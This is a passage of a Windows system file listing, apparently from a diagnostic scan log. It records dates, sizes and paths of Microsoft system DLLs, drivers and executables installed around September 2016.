2016-09-30 06:31 - 2016-09-15 18:37 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-09-30 06:31 - 2016-09-15 18:37 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\biwinrt.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe
2016-09-30 06:31 - 2016-09-15 18:36 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00719360 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2016-09-30 06:31 - 2016-09-15 18:36 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00686592 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2016-09-30 06:31 - 2016-09-15 18:36 - 00648192 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngccredprov.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00561664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Wallet.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00456192 _____ (Microsoft Corporation) C:\WINDOWS\system32\puiobj.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00410624 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.CredDialogController.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\system32\credprovslegacy.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-09-30 06:31 - 2016-09-15 18:36 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\setupugc.exe
2016-09-30 06:31 - 2016-09-15 18:35 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Vpn.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00783360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSWorkspace.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00538112 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppcext.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00480768 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsreg.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00417792 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00305152 _____ (Microsoft Corporation) C:\WINDOWS\system32\icsvc.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\DataExchange.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00252416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2016-09-30 06:31 - 2016-09-15 18:35 - 00168960 _____ (Microsoft Corporation) C:\WINDOWS\system32\easwrt.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00441856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AccountsRt.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00424960 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2016-09-30 06:31 - 2016-09-15 18:34 - 00284160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 03753984 _____ (Microsoft Corporation) C:\WINDOWS\system32\bootux.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 01004032 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 00963584 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebcamUi.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-09-30 06:31 - 2016-09-15 18:33 - 00512000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprapi.dll
2016-09-30 06:31 - 2016-09-15 18:32 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2016-09-30 06:31 - 2016-09-15 18:32 - 00634368 _____ (Microsoft Corporation) C:\WINDOWS\system32\StructuredQuery.dll
2016-09-30 06:31 - 2016-09-15 18:32 - 00361472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdesvc.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 09129984 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 01912320 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_fs.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 01553408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_health.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 01053184 _____ (Microsoft Corporation) C:\WINDOWS\system32\qmgr.dll
2016-09-30 06:31 - 2016-09-15 18:31 - 00032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManHTTPConfig.exe
2016-09-30 06:31 - 2016-09-15 18:30 - 01639424 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 01589248 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 01227264 _____ (Microsoft Corporation) C:\WINDOWS\system32\gpsvc.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 00458752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RTMediaFrame.dll
2016-09-30 06:31 - 2016-09-15 18:30 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 01082368 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.BackgroundMediaPlayback.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 00715264 _____ (Microsoft Corporation) C:\WINDOWS\system32\clusapi.dll
2016-09-30 06:31 - 2016-09-15 18:29 - 00156672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RelPost.exe
2016-09-30 06:31 - 2016-09-15 18:28 - 23680512 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 03288064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mispace.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 00718848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.BackgroundMediaPlayer.dll
2016-09-30 06:31 - 2016-09-15 18:28 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fhcfg.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 05111296 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 02860032 _____ (Microsoft Corporation) C:\WINDOWS\system32\storagewmi.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 01078784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Streaming.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00942080 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00702976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Playback.MediaPlayer.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00627200 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceControl.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00582656 _____ (Microsoft Corporation) C:\WINDOWS\system32\BootMenuUX.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00279040 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveui.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\discan.dll
2016-09-30 06:31 - 2016-09-15 18:27 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\manage-bde.exe
2016-09-30 06:31 - 2016-09-15 18:27 - 00171008 _____ (Microsoft Corporation) C:\WINDOWS\system32\fvenotify.exe
2016-09-30 06:31 - 2016-09-15 18:27 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Sens.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 13081088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00501248 _____ (Microsoft Corporation) C:\WINDOWS\system32\imapi2.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00374784 _____ (Microsoft Corporation) C:\WINDOWS\system32\resutils.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2016-09-30 06:31 - 2016-09-15 18:26 - 00112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\BitLockerDeviceEncryption.exe
2016-09-30 06:31 - 2016-09-15 18:26 - 00033792 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeui.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00947200 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsp_sr.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00804864 _____ (Microsoft Corporation) C:\WINDOWS\system32\FrameServer.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00411648 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\offlinesam.dll
2016-09-30 06:31 - 2016-09-15 18:25 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpaceAgent.exe
2016-09-30 06:31 - 2016-09-15 18:25 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\system32\BackgroundMediaPolicy.dll
2016-09-30 06:31 - 2016-09-15 18:24 - 01080320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Ocr.dll
2016-09-30 06:31 - 2016-09-15 18:24 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 08122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 01361408 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 01020928 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00631296 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00611328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.dll
2016-09-30 06:31 - 2016-09-15 18:23 - 00347648 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 08075264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 01709056 _____ (Microsoft Corporation) C:\WINDOWS\system32\wevtsvc.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00983040 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00960000 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00857600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mprddm.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00770560 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-09-30 06:31 - 2016-09-15 18:22 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 04136960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 02800128 _____ (Microsoft Corporation) C:\WINDOWS\system32\netshell.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 00971264 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2016-09-30 06:31 - 2016-09-15 18:21 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-09-30 06:31 - 2016-09-15 18:20 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe
2016-09-30 06:31 - 2016-09-15 18:20 - 02914304 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 02668544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 02476544 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 02424320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Perception.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 01779712 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 01710080 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2016-09-30 06:31 - 2016-09-15 18:20 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsm.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 03202048 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 01130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 00832512 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 00788992 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-09-30 06:31 - 2016-09-15 18:19 - 00730112 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2016-09-30 06:31 - 2016-09-15 18:19 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 01369088 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Phone.dll
2016-09-30 06:31 - 2016-09-15 18:18 - 00455168 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmenrollengine.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 01107456 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2016-09-30 06:31 - 2016-09-15 18:17 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-09-30 06:31 - 2016-09-15 18:16 - 01817088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ResetEngine.dll
2016-09-30 06:31 - 2016-09-15 18:16 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2016-09-30 06:31 - 2016-09-15 18:16 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\system32\spaceman.exe
2016-09-30 06:31 - 2016-08-06 05:34 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\smphost.dll
2016-09-30 06:31 - 2016-08-05 10:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Speech.UXRes.dll
2016-09-30 06:31 - 2016-08-05 10:29 - 00568832 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.UXRes.dll
2016-09-30 06:30 - 2016-09-15 19:37 - 00590960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-09-30 06:30 - 2016-09-15 19:29 - 00424640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ws2_32.dll
2016-09-30 06:30 - 2016-09-15 19:29 - 00169056 _____ (Microsoft Corporation) C:\WINDOWS\system32\skci.dll
2016-09-30 06:30 - 2016-09-15 19:29 - 00074080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vpci.sys
2016-09-30 06:30 - 2016-09-15 19:25 - 00280472 _____ (Microsoft Corporation) C:\WINDOWS\system32\bdeunlock.exe
2016-09-30 06:30 - 2016-09-15 19:24 - 01182048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2016-09-30 06:30 - 2016-09-15 19:22 - 00433832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2016-09-30 06:30 - 2016-09-15 19:21 - 00272720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
2016-09-30 06:30 - 2016-09-15 19:18 - 06654616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-09-30 06:30 - 2016-09-15 19:15 - 00557408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\spaceport.sys
2016-09-30 06:30 - 2016-09-15 19:15 - 00335712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2016-09-30 06:30 - 2016-09-15 19:14 - 01415752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2016-09-30 06:30 - 2016-09-15 19:14 - 00435040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rdbss.sys
2016-09-30 06:30 - 2016-09-15 19:12 - 04131464 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-09-30 06:30 - 2016-09-15 19:12 - 01472536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfplat.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 22219328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01990640 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 01066104 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00862064 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfreadwrite.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00725664 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2016-09-30 06:30 - 2016-09-15 19:11 - 00160096 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2016-09-30 06:30 - 2016-09-15 19:08 - 05683712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-09-30 06:30 - 2016-09-15 19:07 - 01572768 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2016-09-30 06:30 - 2016-09-15 19:07 - 01418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-09-30 06:30 - 2016-09-15 19:07 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmapi.dll
2016-09-30 06:30 - 2016-09-15 19:06 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-09-30 06:30 - 2016-09-15 19:01 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Radios.dll
2016-09-30 06:30 - 2016-09-15 19:00 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2016-09-30 06:30 - 2016-09-15 18:59 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\unimdm.tsp
2016-09-30 06:30 - 2016-09-15 18:59 - 00136192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinRtTracing.dll
2016-09-30 06:30 - 2016-09-15 18:59 - 00094208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepositoryClient.dll
2016-09-30 06:30 - 2016-09-15 18:59 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00291840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Search.ProtocolHandler.MAPI2.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00142336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFi.dll
2016-09-30 06:30 - 2016-09-15 18:58 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.SerialCommunication.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00392192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.Input.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Gaming.XboxLive.Storage.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll
2016-09-30 06:30 - 2016-09-15 18:57 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2016-09-30 06:30 - 2016-09-15 18:56 - 00609280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Import.dll
2016-09-30 06:30 - 2016-09-15 18:56 - 00298496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll
2016-09-30 06:30 - 2016-09-15 18:56 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Core.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00483840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.AllJoyn.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\efswrt.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00386048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.WiFiDirect.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00325120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00284672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepsync.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00218624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WwaApi.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00185856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00125952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apprepapi.dll
2016-09-30 06:30 - 2016-09-15 18:55 - 00114176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setupugc.exe
2016-09-30 06:30 - 2016-09-15 18:54 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-09-30 06:30 - 2016-09-15 18:54 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Picker.dll
2016-09-30 06:30 - 2016-09-15 18:53 - 00819200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppContracts.dll
2016-09-30 06:30 - 2016-09-15 18:53 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-09-30 06:30 - 2016-09-15 18:52 - 00500224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Graphics.Printing.dll
2016-09-30 06:30 - 2016-09-15 18:52 - 00445952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mprapi.dll
